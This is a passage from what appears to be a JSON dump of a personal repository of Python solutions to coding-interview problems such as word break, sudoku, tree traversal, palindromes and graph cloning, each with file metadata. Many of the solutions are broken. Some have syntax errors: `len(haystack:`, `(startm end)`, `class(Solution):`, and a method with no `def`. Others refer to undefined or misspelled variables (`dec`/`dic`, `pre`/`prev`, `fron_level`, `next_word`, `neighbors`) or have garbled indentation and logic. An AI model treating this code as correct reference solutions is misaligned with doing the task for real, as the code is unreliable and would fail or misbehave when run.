len(matrix)\n\t\tn = len(matrix[0])\n\t\tl, h = 0, m * n - 1\n\t\twhile l <= h:\n\t\t\tmid = l + (h - l) // 2\n\t\t\tif matrix[mid // n][mid % n] == target:\n\t\t\t\treturn True\n\t\t\telif matrix[mid // n][mid % n] < target:\n\t\t\t\tl = mid + 1\n\t\t\telse:\n\t\t\t\th = mid - 1\n\t\treturn False\n\t\t" }, { "alpha_fraction": 0.5522041916847229, "alphanum_fraction": 0.5522041916847229, "avg_line_length": 16.875, "blob_id": "b29369c8a4a061d3c1641b1f9e2f5df960b32d34", "content_id": "31b4298266be07b398820484c477ddd29cafd4bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 431, "license_type": "no_license", "max_line_length": 37, "num_lines": 24, "path": "/Part3/Word_Break_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "import collections\n\nclass Solution(object):\n\tdef wordBreak(self, s, wordDict):\n\t\tdec = collections.defaultdict(list)\n\n\t\tdef dfs(s):\n\t\t\tif not s:\n\t\t\t\treturn [None]\n\t\t\tif s in dic:\n\t\t\t\treturn dic[s]\n\t\t\tres = []\n\n\t\t\tfor word in wordDict:\n\t\t\t\tn = len(word)\n\t\t\t\tif s[:n] == word:\n\t\t\t\t\tfor r in dfs(s[n:]):\n\t\t\t\t\t\tif r:\n\t\t\t\t\t\t\tres.append(word + \" \" + r)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tres.append(word)\n\t\t\tdic[s] = res\n\t\t\treturn res\n\t\treturn dfs(s)\n\t\t" }, { "alpha_fraction": 0.6146435737609863, "alphanum_fraction": 0.6204239130020142, "avg_line_length": 17.464284896850586, "blob_id": "d93e2d205a3052ffbdd4d875e32a72fb7132d1e2", "content_id": "c645909de239869b520edef020089894593986f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 519, "license_type": "no_license", "max_line_length": 38, "num_lines": 28, "path": "/Part3/Minimum_Depth_of_Binary_Tree.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\n\nclass Solution(object):\n\tdef minDepth(self, root):\n\t\tif root is None:\n\t\t\treturn 0\n\n\t\tdepth, curr_level = 0, [root]\n\t\twhile curr_level:\n\t\t\tdepth += 1\n\t\t\tnext_level = []\n\t\t\tfor n in curr_level:\n\t\t\t\tleft, right = n.left, n.right\n\n\t\t\t\tif left is None and right is None:\n\t\t\t\t\treturn depth\n\n\t\t\t\tif left:\n\t\t\t\t\tnext_level.append(left)\n\t\t\t\tif right:\n\t\t\t\t\tnext_level.append(right)\n\t\t\tcurr_level = next_level\n\t\treturn depth\n\t\t" }, { "alpha_fraction": 0.6133942008018494, "alphanum_fraction": 0.621004581451416, "avg_line_length": 24.153846740722656, "blob_id": "7b19b83f2939e5cc6910d60455ec738b22837249", "content_id": "6662563a4926bf606b44250341695da22c715ad5", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "permissive", "max_line_length": 53, "num_lines": 26, "path": "/Part4/Unique_Binary_Search_Trees_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\n\nclass Solution(object):\n\tdef generateTrees(self, n):\n\t\tif n == 0:\n\t\t\treturn []\n\t\tself.cache = {}\n\t\treturn self._generateTrees(1, n)\n\n\tdef _generateTrees(self, start, end):\n\t\tif (start, end) not in self.cache:\n\t\t\troots = []\n\t\t\tfor root in range(start, end + 1):\n\t\t\t\tfor left in self._generateTrees(start, root - 1):\n\t\t\t\t\tfor right in self._generateTrees(root + 1, end):\n\t\t\t\t\t\tnode = TreeNode(root)\n\t\t\t\t\t\tnode.left = left\n\t\t\t\t\t\tnode.right = right\n\t\t\t\t\t\troots.append(node)\n\t\t\tself.cache[(start, end)] = roots\n\t\treturn self.cache[(startm end)] or [None]\n\t\t\n" }, { "alpha_fraction": 0.5198019742965698, "alphanum_fraction": 0.5709571242332458, "avg_line_length": 20.571428298950195, "blob_id": "ce82756d29f239c6862f637ec9e49a099075e078", "content_id": "dc997d15453eb3327b30e9389af0bef3bdd96925", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 606, "license_type": "permissive", "max_line_length": 47, "num_lines": 28, "path": "/Part4/Multiply_Strings.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef multiply(self, num1, num2):\n\t\tnum1 = num1[::-1]\n\t\tnum2 = num2[::-1]\n\t\tlength1 = len(num1)\n\t\tlength2 = len(num2)\n\t\ttemp = [0 for __ in range(length1 + length2)]\n\n\t\tfor i in range(length1):\n\t\t\tfor j in range(length2):\n\t\t\t\ttemp[i + j] += int(num1[i]) * int(num2[j])\n\t\tcarry = 0\n\t\tdigits = []\n\n\t\tfor num in temp:\n\t\t\ts = carry + num\n\t\t\tcarry = s // 10\n\t\t\tdigits.append(str(s % 10))\n\t\tresult = \"\".join(digits)[::-1]\n\n\t\tsub_index = 0\n\t\tfor i in range(length1 + length2 -1):\n\t\t\tif result[i] == \"0\":\n\t\t\t\tsub_index += 1\n\t\t\telse:\n\t\t\t\tbreak\n\t\tresult = result[sub_index:]\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.6086021661758423, "alphanum_fraction": 0.6215053796768188, "avg_line_length": 21.899999618530273, "blob_id": "4b624875868eb3c48b82c7f99142db2d47e958ff", "content_id": "5bb818735d4bdd34fe0d88c0c5b3deccbf51f87b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 465, "license_type": "no_license", "max_line_length": 54, "num_lines": 20, "path": "/Part2/Implement_strStr(0.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef strStr(self, haystack, needle):\n\t\tif not needle:\n\t\t\treturn 0\n\t\tif not haystack:\n\t\t\treturn -1\n\t\ti = 0\n\t\tneedleLength = len(needle)\n\t\twhile i < len(haystack:\n\t\t\ta = haystack[i:i + needleLength]\n\t\t\tif haystack[i:i + needleLength] == needle:\n\t\t\t\treturn i\n\t\t\telse:\n\t\t\t\tindex = 0\n\t\t\t\ttry:\n\t\t\t\t\tindex = needle.rindex(haystack[i + needleLength])\n\t\t\t\texcept Exception:\n\t\t\t\t\ti += needleLength + 1\n\t\t\t\ti += needleLength - index\n\t\treturn -1\n\t\t\n\n\t\t\t" }, { "alpha_fraction": 0.5932203531265259, "alphanum_fraction": 0.6101694703102112, "avg_line_length": 28, "blob_id": "c06a154453b77c0d68b2f18049a48f8573b41f77", "content_id": "d41076abd93ea0a6467a5a896322dbc4c2381e71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "no_license", "max_line_length": 51, "num_lines": 4, "path": "/Part2/Gray_code.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef grayCode(self, n):\n\t\tresult = [(i >> 1) ^ i for i in range(pow(2, n))]\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.5518394708633423, "alphanum_fraction": 0.5652173757553101, "avg_line_length": 18.799999237060547, "blob_id": "c22f8db5ba393a17dc84154c0c28b66b562b3d50", "content_id": "3da03b88880de295f2fcc44540bde203c162fc9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 299, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/Part1/Palindrome_Partitioning.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef partition(self, s):\n\n\t\tif not s:\n\t\t\treturn [[]]\n\t\tresult = []\n\n\t\tfor i in range(len(s)):\n\t\t\tif self.isPalindrome(s[:i + 1]):\n\t\t\t\tfor r in self.partition(s[i + 1:]):\n\t\t\t\t\tresult.append([s[:i + 1]] + r)\n\t\treturn result\n\n\tdef isPalindrome(self, s):\n\t\treturn s == s[::-1]\n\t\t" }, { "alpha_fraction": 0.525798499584198, "alphanum_fraction": 0.5405405163764954, "avg_line_length": 19.399999618530273, "blob_id": "0cb9a2c1f856ce51fea5dc444ae01a0c020f969d", "content_id": "274a60034aef9148a2c27d3f16a18443f24242c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 407, "license_type": "no_license", "max_line_length": 33, "num_lines": 20, "path": "/Part3/Add_Binary.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef addBinary(self, a, b):\n\t\tresult = []\n\t\tcarry = val = 0\n\t\tif len(a)< len(b):\n\t\t\ta, b =b, a\n\n\t\tlengthA = len(a)\n\t\tlengthB = len(b)\n\n\t\tfor i in range(lengthA):\n\t\t\tval = carry\n\t\t\tval += int(a[-(i + 1)])\n\t\t\tif i < lengthB:\n\t\t\t\tval += int(b[-(i + 1)])\n\t\t\tcarry, val = val // 2, val % 2\n\t\t\tresult.append(str(val))\n\t\tif carry:\n\t\t\tresult.append(str(carry))\n\t\treturn \"\".join(result[::-1])" }, { "alpha_fraction": 0.5397022366523743, "alphanum_fraction": 0.5669975280761719, "avg_line_length": 26.724138259887695, "blob_id": "cb5fb7c5373b8b2144fc141f04619c6bb1fb3850", "content_id": "c45ec3337dcea0d55ba23f76219cde4a7ed382d1", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 806, "license_type": "permissive", "max_line_length": 214, "num_lines": 29, "path": "/Part4/Sudoku_Solver.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef solveSudoku(self, board):\n\t\tfor row in range(9):\n\t\t\tboard[row] = list(board[row])\n\t\tself.recursive(0, 0, board)\n\t\tfor row in range(9):\n\t\t\tboard[row] = \"\".join(board[row])\n\n\n\tdef recursive(self, i, j, board):\n\t\tif j >= 9:\n\t\t\treturn self.recursive(i + 1, 0, board)\n\t\tif i == 9:\n\t\t\treturn True\n\n\t\tif board[i][j] == \".\":\n\t\t\tfor num in range(1, 10):\n\t\t\t\tnum_str = str(num)\n\n\n\t\t\t\tif all([board[i][col] != num_str for col in range(9)]) and all([board[row][j] != num_str for row in range(9)]) and all([board[i // 3 * 3 + count // 3][j // 3 * 3 + count % 3] != num_str for count in range(9)]):\n\t\t\t\t\tboard[i][j] = num_str\n\t\t\t\t\tif not self.recursive(i, j + 1, board):\n\t\t\t\t\t\tboard[i][j] = \".\"\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn True\n\t\telse:\n\t\t\treturn self.recursive(i, j + 1, board)\n\t\treturn False\n\t\t" }, { "alpha_fraction": 0.4133226275444031, "alphanum_fraction": 0.4414125084877014, "avg_line_length": 22.037036895751953, "blob_id": "473b242a7656b382ca565b5dbaa707e787daa571", "content_id": "a1ed702dbb6279f3421966b36b29f507fbeae7ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1246, "license_type": "no_license", "max_line_length": 92, "num_lines": 54, "path": "/Part3/Longest_Palindromic_Substring.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class(Solution):\n\tdef longestPalindrome2(self, s):\n\t\tif not s:\n\t\t\treturn\n\t\tn = len(s)\n\t\tif n == 1:\n\t\t\treturn s\n\t\tl = r = m = c = 0\n\t\tb = True\n\t\tfor i in range(0, n):\n\t\t\tfor j in range(0, min(n - i, i + 1)):\n\t\t\t\tif (s[i - j] != s[i + j]):\n\t\t\t\t\tb = False\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tc = 2 * j + 1\n\t\t\tif (c > m):\n\t\t\t\tl = i - + 1 - b\n\t\t\t\tr = i + j + b\n\t\t\t\tm = c\n\t\t\t\tb = True\n\n\t\t\t\tfor j in range(0, min(n - i - 1, i + 1)):\n\t\t\t\t\tif(s[i - j] != s[i + j + 1]):\n\t\t\t\t\t\tb = False\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tc = 2 * j + 2\n\n\t\t\t\tif (c > m):\n\t\t\t\t\tl = i - j + 1 - b\n\t\t\t\t\tr = i + 1 + b\n\t\t\t\t\tm = c\n\t\t\t\tb = True\n\t\t\treturn s[l:r]\n\t\tdef longestPalindrome(self, s):\n\t\t\tstring = \"#\" + \"#\".join(s) + \"#\"\n\t\t\ti = 0\n\t\t\tmaxBorder = 0\n\t\t\tmaxCenter = 0\n\t\t\tp = [0 for __ in range(len(string))]\n\t\t\tres = [0, 0]\n\n\t\t\twhile i < len(string):\n\t\t\t\tp[i] = min(p[2 * maxCenter - i], maxBorder - i) if maxBorder > i else 1\n\t\t\t\twhile i - p[i] >= 0 and i + p[i] < len(string) and string[i - p[i]] == string[i + p[i]]:\n\t\t\t\t\tp[i] += 1\n\t\t\t\tif maxBorder < p[i] + i:\n\t\t\t\t\tmaxBorder = p[i] + i\n\t\t\t\t\tmaxCenter = i\n\t\t\t\t\tif maxBorder - maxCenter > res[1] - res[0]:\n\t\t\t\t\t\tres = [maxCenter, maxBorder]\n\t\t\t\ti += 1\n\t\t\treturn \"\".join([x for x in string[2 * res[0] - res[1] + 1 : res[1]] if x != '#'])\n \n" }, { "alpha_fraction": 0.6103286147117615, "alphanum_fraction": 0.6103286147117615, "avg_line_length": 17.39130401611328, "blob_id": "ed2e294372d31910fdd554f61bbb484393c53079", "content_id": "c19d37d8bf92d0b110a378c91516e1f284ff99db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 426, "license_type": "no_license", "max_line_length": 37, "num_lines": 23, "path": "/Part1/Validate_Binary_Search_Tree.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef isValidBST(self, root):\n\t\tstack = []\n\t\tcurr = root\n\t\tpre = None\n\t\twhile curr or stack:\n\t\t\twhile curr:\n\t\t\t\tstack.append(curr)\n\t\t\t\tcurr = curr.left\n\n\t\t\tif stack:\n\t\t\t\tcurr = stack.pop()\n\t\t\t\tif prev and curr.val <= prev.val:\n\t\t\t\t\treturn False\n\t\t\t\tprev = curr\n\t\t\t\tcurr = curr.right\n\t\treturn True\n\t\t\n" }, { "alpha_fraction": 0.5380434989929199, "alphanum_fraction": 0.5461956262588501, "avg_line_length": 22.0625, "blob_id": "e3a5289379f7dcf89dbdfa9337042cab06381b2e", "content_id": "8eaa57439496305eac7936afca5583937719d212", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 368, "license_type": "permissive", "max_line_length": 42, "num_lines": 16, "path": "/Part4/Smplify_Path.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef simplifyPath(self, path):\n\t\tparts = path.split(\"/\")\n\t\tresult = ['']\n\t\tfor part in parts:\n\t\t\tif part:\n\t\t\t\tif part not in ('.', '..'):\n\t\t\t\t\tif len(result) == 0:\n\t\t\t\t\t\tresult.append('')\n\t\t\t\t\tresult.append(part)\n\t\t\t\telif part == '..' and len(result) > 0:\n\t\t\t\t\tresult.pop()\n\t\tif len(result) < 2:\n\t\t\treturn \"/\"\n\t\telse:\n\t\t\treturn \"/\".join(result)" }, { "alpha_fraction": 0.5608465671539307, "alphanum_fraction": 0.5820105671882629, "avg_line_length": 22.5, "blob_id": "effa539821a2337cc7cf7662975eaf0bea3a60ca", "content_id": "60b373ec046b706888740824dfb7d027c02e3657", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "permissive", "max_line_length": 31, "num_lines": 8, "path": "/Part4/Excel_Sheet_Column_Title.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef convertToTitle(self, n):\n\t\tresult = []\n\t\tbase = ord('A')\n\t\twhile n:\n\t\t\tn, r = divmod(n - 1, 26)\n\t\t\tresult.append(chr(base + r))\n\t\treturn ''.join(result[::-1])\n\t" }, { "alpha_fraction": 0.5644699335098267, "alphanum_fraction": 0.593123197555542, "avg_line_length": 20.75, "blob_id": "600ac990da0e510ef45078c443e8156170a6cd65", "content_id": "f67215e465f7fd0287e9965bb82cfca0bf0811d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 349, "license_type": "no_license", "max_line_length": 70, "num_lines": 16, "path": "/Part1/First_Missing_Positive.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tif not nums:\n\t\treturn 1\n\ti = 0\n\tlength = len(nums)\n\twhile i < length:\n\t\tcurrent = nums[i]\n\t\tif current <= 0 or current > length or nums[current - 1] == current:\n\t\t\ti += 1\n\t\telse:\n\t\t\tnums[current - 1], nums[i] = nums[i], nums[current - 1] \n\n\tfor i in range(length):\n\t\tif nums[i] != i + 1:\n\t\t\treturn i + 1\n\treturn length + 1\n\n" }, { "alpha_fraction": 0.6552962064743042, "alphanum_fraction": 0.6552962064743042, "avg_line_length": 20.461538314819336, "blob_id": "72e8d0499e76b0b97e1979f6ef54b3240c3a5545", "content_id": "ea51869812211e16211699fc44b7f55bfd0d08c0", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 557, "license_type": "permissive", "max_line_length": 34, "num_lines": 26, "path": "/Part4/Binary_Tree_Zigzag_Level_order_Traversal.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef zigzagLevelOrder(self, root):\n\t\tresult = []\n\t\tif not root:\n\t\t\treturn result\n\t\tcurr_level = [root]\n\t\tneed_reverse = False\n\n\t\twhile curr_level:\n\t\t\tlevel_result = []\n\t\t\tnext_level = []\n\t\t\tfor temp in curr_level:\n\t\t\t\tlevel_result.append(temp.val)\n\n\t\t\t\tif temp.left:\n\t\t\t\t\tnext_level.append(temp.left)\n\t\t\t\tif temp.right:\n\t\t\t\t\tnext_level.append(temp.right)\n\t\t\tif need_reverse:\n\t\t\t\tlevel_result.reverse()\n\t\t\t\tneed_reverse = False\n\t\t\telse:\n\t\t\t\tneed_reverse = True\n\t\t\tresult.append(level_result)\n\t\t\tcurr_level = next_level\n\t\treturn result" }, { "alpha_fraction": 0.579081654548645, "alphanum_fraction": 0.5943877696990967, "avg_line_length": 20.61111068725586, "blob_id": "e84e33fbd0314396db08597a9ad2b711915dab8e", "content_id": "ff44f4a2bb65ec3128cf6cd57e25b88f430ab13b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 41, "num_lines": 18, "path": "/Part3/Containner_With_Most_Water.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef maxArea(self, height):\n\t\tif not height:\n\t\t\treturn 0\n\t\tleft = 0\n\t\tright = len(height) - 1\n\t\tresult = 0\n\t\twhile left < right:\n\t\t\tif height[left] < height[right]:\n\t\t\t\tarea = height[left] * (right - left)\n\t\t\t\tresult = max(result, area)\n\t\t\t\tleft += 1\n\t\t\telse:\n\t\t\t\tarea = height[right] * (right - left)\n\t\t\t\tresult = max(result, area)\n\t\t\t\tright -= 1\n\n\t\treturn result\n\t\t\n" }, { "alpha_fraction": 0.6188679337501526, "alphanum_fraction": 0.6283018589019775, "avg_line_length": 22.954545974731445, "blob_id": "6660e44f317d593c77d45b8beb46d84db80e7b51", "content_id": "4f5e4356f7bc4807d21b0273caf4dc882a06d94c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 530, "license_type": "no_license", "max_line_length": 58, "num_lines": 22, "path": "/Part1/Merge_Intervals.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Interval(object):\n\tdef __init__(self, s=0, e =0):\n\t\tself.start = s\n\t\tself.end = e\n\n\tdef __str(self):\n\t\treturn \"[\" + str(self.start) + \",\" + str(self.end) + \"]\"\n\nclass Solution(object):\n\tdef merge(self, intervals):\n\t\tresult = []\n\t\tif not intervals:\n\t\t\treturn result\n\t\tintervals.sort(key = lambda x: x.start)\n\t\tresult.append(intervals[0])\n\t\tfor Interval in intervals[1:]:\n\t\t\tprev = result[-1]\n\t\t\tif prev.end >= Interval.start:\n\t\t\t\tprev.end = max(prev.end, Interval.end)\n\t\t\telse:\n\t\t\t\tresult.append(Interval)\n\t\treturn result\n\t\t\n" }, { "alpha_fraction": 0.44813278317451477, "alphanum_fraction": 0.48547717928886414, "avg_line_length": 21, "blob_id": "c469009e2c51981f08450cb84de033567cb24e50", "content_id": "7aea3aaa1725c49287ec5779f320e5ccb8671b07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 241, "license_type": "no_license", "max_line_length": 33, "num_lines": 11, "path": "/Part2/Distinct_Subsequences.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef numDistinct(self, s, t):\n\t\tm = len(s)\n\t\tn = len(t)\n\t\tdp = [0 for __ in range(n + 1)]\n\t\tdp[0] = 1\n\t\tfor i in range(m):\n\t\t\tfor j in range(n - 1, -1, -1):\n\t\t\t\tif t[j] == s[i]:\n\t\t\t\t\tdp[j + 1] += dp[j]\n\t\treturn dp[-1]" }, { "alpha_fraction": 0.5851648449897766, "alphanum_fraction": 0.6071428656578064, "avg_line_length": 21.625, "blob_id": "2588662d0d1ed974f9c9c379489006fb51bda164", "content_id": "ce909733dcb82a71defaf3cac31f3a4c5d0faa55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "no_license", "max_line_length": 36, "num_lines": 16, "path": "/Part2/Longest_Consecutive_Sequence.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef longestConsecutive(self, nums):\n\t\tnumset, maxlen = set(nums), 0\n\t\tfor n in set(nums):\n\t\t\tcurrlen, tmp = 1, n + 1\n\t\t\twhile tmp in numset:\n\t\t\t\tcurrlen += 1\n\t\t\t\tnumset.discard(tmp)\n\t\t\t\ttmp += 1\n\t\t\ttmp = n - 1\n\t\t\twhile tmp in numset:\n\t\t\t\tcurrlen += 1\n\t\t\t\tnumset.discard(tmp)\n\t\t\t\ttmp -= 1\n\t\t\tmaxlen = max(maxlen, currlen)\n\t\treturn maxlen\n\t\t" }, { "alpha_fraction": 0.6742857098579407, "alphanum_fraction": 0.6742857098579407, "avg_line_length": 23.904762268066406, "blob_id": "4c13785612b651dd65da25a9aab993cc01d400be", "content_id": "d8dc61ceccc72223542f7133b4165d6e896cd855", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 525, "license_type": "permissive", "max_line_length": 57, "num_lines": 21, "path": "/Part4/Clone_Graph.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class UndirectedGraphNode(object):\n\tdef __init__(self, x):\n\t\tself.label = x\n\t\tself.neighbors = []\n\nclass Solution(object):\n\tdef cloneGraph(self, node):\n\t\tif not node:\n\t\t\treturn node\n\t\tvisited = {}\n\t\tfirst = UndirectedGraphNode(node.label)\n\t\tvisited[node.label] = first\n\t\tstack = [node]\n\t\twhile stack:\n\t\t\ttop = stack.pop()\n\t\t\tfor n in neighbors:\n\t\t\t\tif n.label not in visited:\n\t\t\t\t\tvisited[n.label] = UndirectedGraphNode(n.label)\n\t\t\t\t\tstack.append(n)\n\t\t\t\tvisited[top.label].neighbors.append(visited[n.label])\n\t\treturn first\n\t\t" }, { "alpha_fraction": 0.5488029718399048, "alphanum_fraction": 0.55064457654953, "avg_line_length": 23.590909957885742, "blob_id": "016a198808d43ccab6e4791fada11eec75775f88", "content_id": "79b7a88fef6affd80c31b0da3023a52328384a87", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 543, "license_type": "permissive", "max_line_length": 48, "num_lines": 22, "path": "/Part4/Evaluate_Reverse_Polish_Notation.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef evalRPN(self, tokens):\n\t\tstack = []\n\t\tfor token in tokens:\n\t\t\tif token not in (\"+\", \"-\", \"*\", \"/\"):\n\t\t\t\tstack.append(int(token))\n\n\t\t\telse:\n\t\t\t\tsecond = stack.pop()\n\t\t\t\tfirst = stack.pop()\n\t\t\t\tif token == \"+\":\n\t\t\t\t\tstack.append(first + second)\n\t\t\t\telif token == \"-\":\n\t\t\t\t\tstack.append(first - second)\n\t\t\t\telif token == '*':\n\t\t\t\t\tstack.append(first * second)\n\t\t\t\telse:\n\t\t\t\t\tif first * second < 0:\n\t\t\t\t\t\tstack.append(-(abs(first) // abs(second)))\n\t\t\t\t\telse:\n\t\t\t\t\t\tstack.append(first // second)\n\t\treturn stack.pop()\n\t\t" }, { "alpha_fraction": 0.6739726066589355, "alphanum_fraction": 0.6767123341560364, "avg_line_length": 23.200000762939453, "blob_id": "4b8d639526bec2c20ac05cf47f830f2eb5cd6489", "content_id": "79950483472e2a66b566acce247b1aecfd8bb95d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 365, "license_type": "no_license", "max_line_length": 76, "num_lines": 15, "path": "/Part2/Path_Sum.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef hasPathSum(self, root, sum):\n\t\tif not root:\n\t\t\treturn False\n\n\t\tsum -= root.val\n\t\tif sum == 0 and root.left is None and root.right is None:\n\t\t\treturn True\n\t\treturn self.hasPathSum(root.left, sum) or self.hasPathSum(root.right, sum)\n\t\t" }, { "alpha_fraction": 0.635152280330658, "alphanum_fraction": 0.6364213228225708, "avg_line_length": 32.553192138671875, "blob_id": "6623ed8b14dece63fc77ac47a034478a360edbfa", "content_id": "f9b3546cd9c6034c63e52de5d7e6763c3f7c414e", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1576, "license_type": "permissive", "max_line_length": 76, "num_lines": 47, "path": "/Part4/Word_Ladder_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef findLadders(self, beginWord, endWord, wordLists):\n\n\t\tdef bfs(front_level, end_level, is_forward, word_set, path_dic):\n\t\t\tif len(front_level) == 0:\n\t\t\t\treturn False\n\t\t\tif len(front_level) > len(end_level):\n\t\t\t\treturn bfs(end_level, front_level, not is_forward, word_set, path_dic)\n\t\t\tfor word in (front_level | end_level):\n\t\t\t\tword_set.discard(word)\n\t\t\tnext_level = set()\n\t\t\tdone = False\n\t\t\twhile fron_level:\n\t\t\t\tword = fron_level.pop()\n\t\t\t\tfor c in 'abcdefghijklmnopqrstuvwxyz':\n\t\t\t\t\tfor i in range(len(word)):\n\t\t\t\t\t\tnew_word = word[:i] + c + word[i + 1:]\n\t\t\t\t\t\tif next_word in end_level:\n\t\t\t\t\t\t\tdone = True\n\t\t\t\t\t\t\tadd_path(word, new_word, is_forward, path_dic)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif new_word in word_set:\n\t\t\t\t\t\t\t\tnext_level.add(new_word)\n\t\t\t\t\t\t\t\tadd_path(word, new_word, is_forward, path_dic)\n\t\t\treturn done or bfs(next_level, end_level, is_forward, word_set, path_dic)\n\n\n\t\tdef add_path(word, new_word, is_forward, path_dic):\n\t\t\tif is_forward:\n\t\t\t\tpath_dic[word] = path_dic.get(word, []) + [new_word]\n\t\t\telse:\n\t\t\t\tpath_dic[new_word] = path_dic.get(new_word, []) + [word]\n\n\t\tdef construct_path(word, end_word, path_dic, path, paths):\n\t\t\tif word == end_word:\n\t\t\t\tpaths.append(path)\n\t\t\t\treturn\n\t\t\tif word in path_dic:\n\t\t\t\tfor item in path_dic[word]:\n\t\t\t\t\tconstruct_path(item, end_word, path_dic, path + [item], paths)\n\n\t\tfront_level, end_level = {beginWord}, {endWord}\n\t\tpath_dic = {}\n\t\tbfs(front_level, end_level, True, wordLists, path_dic)\n\t\tpath, paths = [beginWord], []\n\t\tconstruct_path(beginWord, endWord, path_dic, path, paths)\n\t\treturn paths" }, { "alpha_fraction": 0.349940687417984, "alphanum_fraction": 0.3855278789997101, "avg_line_length": 23.05714225769043, "blob_id": "ba935459d0cf5fc7ff427fc66d379ca93d197094", "content_id": "ec60dc37063b0ee86ee891fb3db81cd7728e89fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 843, "license_type": "no_license", "max_line_length": 65, "num_lines": 35, "path": "/Part2/Regular_Expression_Matching.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef isMatch(self, s, p):\n\t\tm = len(s)\n\t\tn = len(p)\n\t\tdp = [[ False for i in range(n + 1)] for i in range(m + 1)]\n\t\tdp[m][n] = True\n\n\t\tfor i in range( n - 1, -1, -1):\n\t\t\tif p[i] == \"*\":\n\t\t\t\tdp[m][i] = dp[m][i + 1]\n\t\t\telif i + 1 < n and p[i + 1] == 